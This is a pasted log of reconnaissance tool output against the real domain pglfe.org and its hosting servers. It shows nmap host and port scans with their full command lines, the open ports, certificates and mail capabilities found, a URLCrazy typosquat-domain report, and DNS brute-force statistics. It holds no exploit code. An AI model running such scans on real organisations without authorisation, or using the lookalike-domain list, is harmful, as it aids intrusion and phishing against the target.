725 Checking 3 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
726 Host 192.252.144.29 is up (reset ttl 64)
727 Host 192.252.145.29 is up (reset ttl 64)
728 Host 192.252.144.58 is up (reset ttl 64)
729
730 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
731 Scanning ip 192.252.144.29 (server279.com (PTR)):
732 21/tcp open ftp syn-ack ttl 48 ProFTPD
733 22/tcp open tcpwrapped syn-ack ttl 48
734 |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
735 53/tcp open tcpwrapped syn-ack ttl 48
736 80/tcp open tcpwrapped syn-ack ttl 48
737 110/tcp open tcpwrapped syn-ack ttl 48
738 143/tcp open tcpwrapped syn-ack ttl 48
739 |_imap-capabilities: capabilities post-login more IMAP4rev1 have ENABLE Pre-login listed SASL-IR OK ID AUTH=PLAINA0001 IDLE STARTTLS LOGIN-REFERRALS LITERAL+
740 443/tcp open tcpwrapped syn-ack ttl 48
741 | ssl-cert: Subject: commonName=catchall-server-default.server279.com
742 | Subject Alternative Name: DNS:catchall-server-default.server279.com
743 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
744 | Public Key type: rsa
745 | Public Key bits: 2048
746 | Signature Algorithm: sha256WithRSAEncryption
747 | Not valid before: 2019-09-22T05:35:30
748 | Not valid after: 2019-12-21T05:35:30
749 | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
750 |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
751 465/tcp open tcpwrapped syn-ack ttl 48
752 |_smtp-commands: Couldn't establish connection on port 465
753 | ssl-cert: Subject: commonName=ssl.server279.com
754 | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
755 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
756 | Public Key type: rsa
757 | Public Key bits: 2048
758 | Signature Algorithm: sha256WithRSAEncryption
759 | Not valid before: 2019-09-22T05:35:22
760 | Not valid after: 2019-12-21T05:35:22
761 | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
762 |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
763 587/tcp open tcpwrapped syn-ack ttl 48
764 | smtp-commands: server279.com, STARTTLS, PIPELINING, 8BITMIME, SIZE 0, AUTH LOGIN PLAIN CRAM-MD5,
765 |_ netqmail home page: http://qmail.org/netqmail
766 993/tcp open tcpwrapped syn-ack ttl 48
767 995/tcp open tcpwrapped syn-ack ttl 48
768 3306/tcp open tcpwrapped syn-ack ttl 48
769 OS Info: Service Info: Host: 192.252.144.29; OS: Unix
770 Scanning ip 192.252.145.29 (ns2.server279.com (PTR)):
771 21/tcp open tcpwrapped syn-ack ttl 48
772 53/tcp open tcpwrapped syn-ack ttl 48
773 80/tcp open tcpwrapped syn-ack ttl 48
774 110/tcp open tcpwrapped syn-ack ttl 48
775 143/tcp open tcpwrapped syn-ack ttl 48
776 443/tcp open tcpwrapped syn-ack ttl 48
777 465/tcp open tcpwrapped syn-ack ttl 48
778 |_smtp-commands: Couldn't establish connection on port 465
779 | ssl-cert: Subject: commonName=ssl.server279.com
780 | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
781 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
782 | Public Key type: rsa
783 | Public Key bits: 2048
784 | Signature Algorithm: sha256WithRSAEncryption
785 | Not valid before: 2019-09-22T05:35:22
786 | Not valid after: 2019-12-21T05:35:22
787 | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
788 |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
789 587/tcp open tcpwrapped syn-ack ttl 48
790 |_smtp-commands: Couldn't establish connection on port 587
791 993/tcp open tcpwrapped syn-ack ttl 48
792 995/tcp open tcpwrapped syn-ack ttl 48
793 3306/tcp open tcpwrapped syn-ack ttl 48
794 Scanning ip 192.252.144.58 (www.pglfe.org.):
795 21/tcp open tcpwrapped syn-ack ttl 48
796 80/tcp open tcpwrapped syn-ack ttl 48
797 110/tcp open tcpwrapped syn-ack ttl 48
798 143/tcp open tcpwrapped syn-ack ttl 48
799 443/tcp open tcpwrapped syn-ack ttl 48
800 | http-methods:
801 |_ Supported Methods: OPTIONS
802 | ssl-cert: Subject: commonName=catchall-server-default.server279.com
803 | Subject Alternative Name: DNS:catchall-server-default.server279.com
804 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
805 | Public Key type: rsa
806 | Public Key bits: 2048
807 | Signature Algorithm: sha256WithRSAEncryption
808 | Not valid before: 2019-09-22T05:35:30
809 | Not valid after: 2019-12-21T05:35:30
810 | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
811 |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
812 587/tcp open tcpwrapped syn-ack ttl 48
813 |_smtp-commands: Couldn't establish connection on port 587
814 993/tcp open tcpwrapped syn-ack ttl 48
815 995/tcp open tcpwrapped syn-ack ttl 48
816 3306/tcp open tcpwrapped syn-ack ttl 48
817 WebCrawling domain's web servers... up to 50 max links.
818--Finished--
819Summary information for domain pglfe.org.
820-----------------------------------------
821 Domain Specific Information:
822 Email: pglsec@pglfe.org)
823
824 Domain Ips Information:
825 IP: 192.252.144.29
826 HostName: ns1.server279.com Type: NS
827 HostName: server279.com Type: PTR
828 Country: United States
829 Is Active: True (reset ttl 64)
830 Port: 21/tcp open ftp syn-ack ttl 48 ProFTPD
831 Port: 22/tcp open tcpwrapped syn-ack ttl 48
832 Script Info: |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
833 Port: 53/tcp open tcpwrapped syn-ack ttl 48
834 Port: 80/tcp open tcpwrapped syn-ack ttl 48
835 Port: 110/tcp open tcpwrapped syn-ack ttl 48
836 Port: 143/tcp open tcpwrapped syn-ack ttl 48
837 Script Info: |_imap-capabilities: capabilities post-login more IMAP4rev1 have ENABLE Pre-login listed SASL-IR OK ID AUTH=PLAINA0001 IDLE STARTTLS LOGIN-REFERRALS LITERAL+
838 Port: 443/tcp open tcpwrapped syn-ack ttl 48
839 Script Info: | ssl-cert: Subject: commonName=catchall-server-default.server279.com
840 Script Info: | Subject Alternative Name: DNS:catchall-server-default.server279.com
841 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
842 Script Info: | Public Key type: rsa
843 Script Info: | Public Key bits: 2048
844 Script Info: | Signature Algorithm: sha256WithRSAEncryption
845 Script Info: | Not valid before: 2019-09-22T05:35:30
846 Script Info: | Not valid after: 2019-12-21T05:35:30
847 Script Info: | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
848 Script Info: |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
849 Port: 465/tcp open tcpwrapped syn-ack ttl 48
850 Script Info: |_smtp-commands: Couldn't establish connection on port 465
851 Script Info: | ssl-cert: Subject: commonName=ssl.server279.com
852 Script Info: | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
853 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
854 Script Info: | Public Key type: rsa
855 Script Info: | Public Key bits: 2048
856 Script Info: | Signature Algorithm: sha256WithRSAEncryption
857 Script Info: | Not valid before: 2019-09-22T05:35:22
858 Script Info: | Not valid after: 2019-12-21T05:35:22
859 Script Info: | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
860 Script Info: |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
861 Port: 587/tcp open tcpwrapped syn-ack ttl 48
862 Script Info: | smtp-commands: server279.com, STARTTLS, PIPELINING, 8BITMIME, SIZE 0, AUTH LOGIN PLAIN CRAM-MD5,
863 Script Info: |_ netqmail home page: http://qmail.org/netqmail
864 Port: 993/tcp open tcpwrapped syn-ack ttl 48
865 Port: 995/tcp open tcpwrapped syn-ack ttl 48
866 Port: 3306/tcp open tcpwrapped syn-ack ttl 48
867 Os Info: Host: 192.252.144.29; OS: Unix
868 IP: 192.252.145.29
869 HostName: ns2.server279.com Type: NS
870 HostName: ns2.server279.com Type: PTR
871 Country: United States
872 Is Active: True (reset ttl 64)
873 Port: 21/tcp open tcpwrapped syn-ack ttl 48
874 Port: 53/tcp open tcpwrapped syn-ack ttl 48
875 Port: 80/tcp open tcpwrapped syn-ack ttl 48
876 Port: 110/tcp open tcpwrapped syn-ack ttl 48
877 Port: 143/tcp open tcpwrapped syn-ack ttl 48
878 Port: 443/tcp open tcpwrapped syn-ack ttl 48
879 Port: 465/tcp open tcpwrapped syn-ack ttl 48
880 Script Info: |_smtp-commands: Couldn't establish connection on port 465
881 Script Info: | ssl-cert: Subject: commonName=ssl.server279.com
882 Script Info: | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
883 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
884 Script Info: | Public Key type: rsa
885 Script Info: | Public Key bits: 2048
886 Script Info: | Signature Algorithm: sha256WithRSAEncryption
887 Script Info: | Not valid before: 2019-09-22T05:35:22
888 Script Info: | Not valid after: 2019-12-21T05:35:22
889 Script Info: | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
890 Script Info: |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
891 Port: 587/tcp open tcpwrapped syn-ack ttl 48
892 Script Info: |_smtp-commands: Couldn't establish connection on port 587
893 Port: 993/tcp open tcpwrapped syn-ack ttl 48
894 Port: 995/tcp open tcpwrapped syn-ack ttl 48
895 Port: 3306/tcp open tcpwrapped syn-ack ttl 48
896 IP: 192.252.144.58
897 HostName: mail.pglfe.org Type: MX
898 HostName: www.pglfe.org. Type: A
899 Country: United States
900 Is Active: True (reset ttl 64)
901 Port: 21/tcp open tcpwrapped syn-ack ttl 48
902 Port: 80/tcp open tcpwrapped syn-ack ttl 48
903 Port: 110/tcp open tcpwrapped syn-ack ttl 48
904 Port: 143/tcp open tcpwrapped syn-ack ttl 48
905 Port: 443/tcp open tcpwrapped syn-ack ttl 48
906 Script Info: | http-methods:
907 Script Info: |_ Supported Methods: OPTIONS
908 Script Info: | ssl-cert: Subject: commonName=catchall-server-default.server279.com
909 Script Info: | Subject Alternative Name: DNS:catchall-server-default.server279.com
910 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
911 Script Info: | Public Key type: rsa
912 Script Info: | Public Key bits: 2048
913 Script Info: | Signature Algorithm: sha256WithRSAEncryption
914 Script Info: | Not valid before: 2019-09-22T05:35:30
915 Script Info: | Not valid after: 2019-12-21T05:35:30
916 Script Info: | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
917 Script Info: |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
918 Port: 587/tcp open tcpwrapped syn-ack ttl 48
919 Script Info: |_smtp-commands: Couldn't establish connection on port 587
920 Port: 993/tcp open tcpwrapped syn-ack ttl 48
921 Port: 995/tcp open tcpwrapped syn-ack ttl 48
922 Port: 3306/tcp open tcpwrapped syn-ack ttl 48
923
924--------------End Summary --------------
925-----------------------------------------
926#######################################################################################################################################
927URLCrazy Domain Report
928Domain : www.pglfe.org
929Keyboard : qwerty
930At : 2019-11-25 08:04:14 -0500
931
932# Please wait. 116 hostnames to process
933
934Typo Type Typo DNS-A CC-A DNS-MX Extn
935---------------------------------------------------------------------------------------------------------
936Character Omission ww.pglfe.org 192.252.144.58 org
937Character Omission www.glfe.org 134.0.9.8 CH,SWITZERLAND org
938Character Omission www.pgfe.org ? org
939Character Omission www.pgle.org 176.32.230.23 GB,UNITED KINGDOM org
940Character Omission www.pglf.org 45.55.83.166 org
941Character Omission www.plfe.org ? org
942Character Omission wwwpglfe.org ? org
943Character Repeat www.pgglfe.org ? org
944Character Repeat www.pglfee.org ? org
945Character Repeat www.pglffe.org ? org
946Character Repeat www.pgllfe.org ? org
947Character Repeat www.ppglfe.org ? org
948Character Repeat wwww.pglfe.org 192.252.144.58 org
949Character Swap ww.wpglfe.org ? org
950Character Swap www.gplfe.org ? org
951Character Swap www.pgfle.org ? org
952Character Swap www.pglef.org ? org
953Character Swap www.plgfe.org ? org
954Character Swap wwwp.glfe.org 134.0.9.8 ES,SPAIN mail.glfe.org org
955Character Replacement eww.pglfe.org 192.252.144.58 org
956Character Replacement qww.pglfe.org 192.252.144.58 org
957Character Replacement wew.pglfe.org 192.252.144.58 org
958Character Replacement wqw.pglfe.org 192.252.144.58 org
959Character Replacement wwe.pglfe.org 192.252.144.58 org
960Character Replacement wwq.pglfe.org 192.252.144.58 org
961Character Replacement www.oglfe.org ? org
962Character Replacement www.pflfe.org ? org
963Character Replacement www.pgkfe.org ? org
964Character Replacement www.pglde.org ? org
965Character Replacement www.pglfr.org ? org
966Character Replacement www.pglfw.org ? org
967Character Replacement www.pglge.org ? org
968Character Replacement www.phlfe.org ? org
969Double Character Replacement eew.pglfe.org 192.252.144.58 org
970Double Character Replacement qqw.pglfe.org 192.252.144.58 org
971Double Character Replacement wee.pglfe.org 192.252.144.58 org
972Double Character Replacement wqq.pglfe.org 192.252.144.58 org
973Character Insertion weww.pglfe.org 192.252.144.58 org
974Character Insertion wqww.pglfe.org 192.252.144.58 org
975Character Insertion wwew.pglfe.org 192.252.144.58 org
976Character Insertion wwqw.pglfe.org 192.252.144.58 org
977Character Insertion www.pgflfe.org ? org
978Character Insertion www.pghlfe.org ? org
979Character Insertion www.pglfde.org ? org
980Character Insertion www.pglfer.org ? org
981Character Insertion www.pglfew.org ? org
982Character Insertion www.pglfge.org ? org
983Character Insertion www.pglkfe.org ? org
984Character Insertion www.poglfe.org ? org
985Character Insertion wwwe.pglfe.org 192.252.144.58 org
986Character Insertion wwwq.pglfe.org 192.252.144.58 org
987Missing Dot wwwwww.pglfe.org 192.252.144.58 org
988Singular or Pluralise pglfe.org 192.252.144.58 mail.pglfe.org org
989Singular or Pluralise pglves.org ? org
990Vowel Swap www.pglfa.org ? org
991Vowel Swap www.pglfi.org ? org
992Vowel Swap www.pglfo.org ? org
993Vowel Swap www.pglfu.org ? org
994Bit Flipping 7ww.pglfe.org 192.252.144.58 org
995Bit Flipping gww.pglfe.org 192.252.144.58 org
996Bit Flipping sww.pglfe.org 192.252.144.58 org
997Bit Flipping uww.pglfe.org 192.252.144.58 org
998Bit Flipping vww.pglfe.org 192.252.144.58 org
999Bit Flipping w7w.pglfe.org 192.252.144.58 org
1000Bit Flipping wgw.pglfe.org 192.252.144.58 org
1001Bit Flipping wsw.pglfe.org 192.252.144.58 org
1002Bit Flipping wuw.pglfe.org 192.252.144.58 org
1003Bit Flipping wvw.pglfe.org 192.252.144.58 org
1004Bit Flipping ww7.pglfe.org 192.252.144.58 org
1005Bit Flipping wwg.pglfe.org 192.252.144.58 org
1006Bit Flipping wws.pglfe.org 192.252.144.58 org
1007Bit Flipping wwu.pglfe.org 192.252.144.58 org
1008Bit Flipping wwv.pglfe.org 192.252.144.58 org
1009Bit Flipping www.0glfe.org ? org
1010Bit Flipping www.pclfe.org ? org
1011Bit Flipping www.pelfe.org ? org
1012Bit Flipping www.pgdfe.org ? org
1013Bit Flipping www.pghfe.org ? org
1014Bit Flipping www.pglbe.org ? org
1015Bit Flipping www.pglfd.org ? org
1016Bit Flipping www.pglfg.org ? org
1017Bit Flipping www.pglfm.org ? org
1018Bit Flipping www.pglne.org ? org
1019Bit Flipping www.pglve.org ? org
1020Bit Flipping www.pgmfe.org ? org
1021Bit Flipping www.pgnfe.org ? org
1022Bit Flipping www.polfe.org ? org
1023Bit Flipping www.pwlfe.org ? org
1024Bit Flipping www.qglfe.org ? org
1025Bit Flipping www.rglfe.org ? org
1026Bit Flipping www.tglfe.org ? org
1027Bit Flipping www.xglfe.org ? org
1028Bit Flipping wwwnpglfe.org ? org
1029Homoglyphs vvvvvv.pglfe.org 192.252.144.58 org
1030Homoglyphs vvvvw.pglfe.org 192.252.144.58 org
1031Homoglyphs vvwvv.pglfe.org 192.252.144.58 org
1032Homoglyphs vvww.pglfe.org 192.252.144.58 org
1033Homoglyphs wvvvv.pglfe.org 192.252.144.58 org
1034Homoglyphs wvvw.pglfe.org 192.252.144.58 org
1035Homoglyphs wwvv.pglfe.org 192.252.144.58 org
1036Homoglyphs www.pg1fe.org ? org
1037Wrong TLD pglfe.ca ? ca
1038Wrong TLD pglfe.ch ? ch
1039Wrong TLD pglfe.com ? com
1040Wrong TLD pglfe.de ? de
1041Wrong TLD pglfe.edu ? edu
1042Wrong TLD pglfe.es ? es
1043Wrong TLD pglfe.fr ? fr
1044Wrong TLD pglfe.it ? it
1045Wrong TLD pglfe.jp ? jp
1046Wrong TLD pglfe.net ? net
1047Wrong TLD pglfe.nl ? nl
1048Wrong TLD pglfe.no ? no
1049Wrong TLD pglfe.ru ? ru
1050Wrong TLD pglfe.se ? se
1051Wrong TLD pglfe.us ? us
1052#######################################################################################################################################
1053Privileges have been dropped to "nobody:nogroup" for security reasons.
1054
1055Processed queries: 0
1056Received packets: 0
1057Progress: 0.00% (00 h 00 min 00 sec / 00 h 00 min 00 sec)
1058Current incoming rate: 0 pps, average: 0 pps
1059Current success rate: 0 pps, average: 0 pps
1060Finished total: 0, success: 0 (0.00%)
1061Mismatched domains: 0 (0.00%), IDs: 0 (0.00%)
1062Failures: 0: 0.00%, 1: 0.00%, 2: 0.00%, 3: 0.00%, 4: 0.00%, 5: 0.00%, 6: 0.00%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1063Response: | Success: | Total:
1064OK: | 0 ( 0.00%) | 0 ( 0.00%)
1065NXDOMAIN: | 0 ( 0.00%) | 0 ( 0.00%)
1066SERVFAIL: | 0 ( 0.00%) | 0 ( 0.00%)
1067REFUSED: | 0 ( 0.00%) | 0 ( 0.00%)
1068FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1069
1070
1071
1072Processed queries: 1919
1073Received packets: 2017
1074Progress: 100.00% (00 h 00 min 01 sec / 00 h 00 min 01 sec)
1075Current incoming rate: 2016 pps, average: 2016 pps
1076Current success rate: 1259 pps, average: 1259 pps
1077Finished total: 1260, success: 1260 (100.00%)
1078Mismatched domains: 167 (8.34%), IDs: 0 (0.00%)
1079Failures: 0: 42.86%, 1: 79.29%, 2: 25.40%, 3: 4.68%, 4: 0.08%, 5: 0.00%, 6: 0.00%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1080Response: | Success: | Total:
1081OK: | 1074 ( 85.24%) | 1178 ( 58.84%)
1082NXDOMAIN: | 152 ( 12.06%) | 157 ( 7.84%)
1083SERVFAIL: | 34 ( 2.70%) | 37 ( 1.85%)
1084REFUSED: | 0 ( 0.00%) | 630 ( 31.47%)
1085FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1086
1087
1088
1089Processed queries: 1919
1090Received packets: 2839
1091Progress: 100.00% (00 h 00 min 02 sec / 00 h 00 min 02 sec)
1092Current incoming rate: 820 pps, average: 1417 pps
1093Current success rate: 491 pps, average: 875 pps
1094Finished total: 1752, success: 1752 (100.00%)
1095Mismatched domains: 353 (12.52%), IDs: 0 (0.00%)
1096Failures: 0: 30.82%, 1: 36.07%, 2: 19.92%, 3: 13.53%, 4: 6.62%, 5: 2.45%, 6: 0.11%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1097Response: | Success: | Total:
1098OK: | 1507 ( 86.02%) | 1758 ( 62.34%)
1099NXDOMAIN: | 199 ( 11.36%) | 210 ( 7.45%)
1100SERVFAIL: | 46 ( 2.63%) | 52 ( 1.84%)
1101REFUSED: | 0 ( 0.00%) | 800 ( 28.37%)
1102FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1103
1104
1105
1106Processed queries: 1919
1107Received packets: 3065
1108Progress: 100.00% (00 h 00 min 03 sec / 00 h 00 min 03 sec)
1109Current incoming rate: 225 pps, average: 1020 pps
1110Current success rate: 133 pps, average: 627 pps
1111Finished total: 1886, success: 1886 (100.00%)
1112Mismatched domains: 405 (13.31%), IDs: 0 (0.00%)
1113Failures: 0: 28.63%, 1: 33.51%, 2: 18.50%, 3: 9.17%, 4: 5.20%, 5: 3.92%, 6: 2.01%, 7: 0.69%, 8: 0.11%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1114Response: | Success: | Total:
1115OK: | 1622 ( 86.00%) | 1915 ( 62.95%)
1116NXDOMAIN: | 214 ( 11.35%) | 227 ( 7.46%)
1117SERVFAIL: | 50 ( 2.65%) | 57 ( 1.87%)
1118REFUSED: | 0 ( 0.00%) | 843 ( 27.71%)
1119FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1120
1121
1122
1123Processed queries: 1919
1124Received packets: 3107
1125Progress: 100.00% (00 h 00 min 04 sec / 00 h 00 min 04 sec)
1126Current incoming rate: 41 pps, average: 775 pps
1127Current success rate: 21 pps, average: 476 pps
1128Finished total: 1908, success: 1908 (100.00%)
1129Mismatched domains: 416 (13.49%), IDs: 0 (0.00%)
1130Failures: 0: 28.30%, 1: 33.12%, 2: 18.29%, 3: 9.07%, 4: 5.14%, 5: 3.46%, 6: 1.57%, 7: 0.68%, 8: 0.68%, 9: 0.26%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1131Response: | Success: | Total:
1132OK: | 1643 ( 86.11%) | 1940 ( 62.91%)
1133NXDOMAIN: | 215 ( 11.27%) | 228 ( 7.39%)
1134SERVFAIL: | 50 ( 2.62%) | 58 ( 1.88%)
1135REFUSED: | 0 ( 0.00%) | 858 ( 27.82%)
1136FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1137
1138
1139
1140Processed queries: 1919
1141Received packets: 3123
1142Progress: 100.00% (00 h 00 min 05 sec / 00 h 00 min 05 sec)
1143Current incoming rate: 15 pps, average: 623 pps
1144Current success rate: 6 pps, average: 382 pps
1145Finished total: 1915, success: 1915 (100.00%)
1146Mismatched domains: 425 (13.71%), IDs: 0 (0.00%)
1147Failures: 0: 28.20%, 1: 33.00%, 2: 18.22%, 3: 9.03%, 4: 5.12%, 5: 3.45%, 6: 1.57%, 7: 0.63%, 8: 0.37%, 9: 0.42%, 10: 0.10%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1148Response: | Success: | Total:
1149OK: | 1650 ( 86.16%) | 1952 ( 62.97%)
1150NXDOMAIN: | 215 ( 11.23%) | 230 ( 7.42%)
1151SERVFAIL: | 50 ( 2.61%) | 59 ( 1.90%)
1152REFUSED: | 0 ( 0.00%) | 859 ( 27.71%)
1153FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1154
1155
1156
1157Processed queries: 1919
1158Received packets: 3133
1159Progress: 100.00% (00 h 00 min 06 sec / 00 h 00 min 06 sec)
1160Current incoming rate: 9 pps, average: 521 pps
1161Current success rate: 2 pps, average: 319 pps
1162Finished total: 1918, success: 1918 (100.00%)
1163Mismatched domains: 432 (13.89%), IDs: 0 (0.00%)
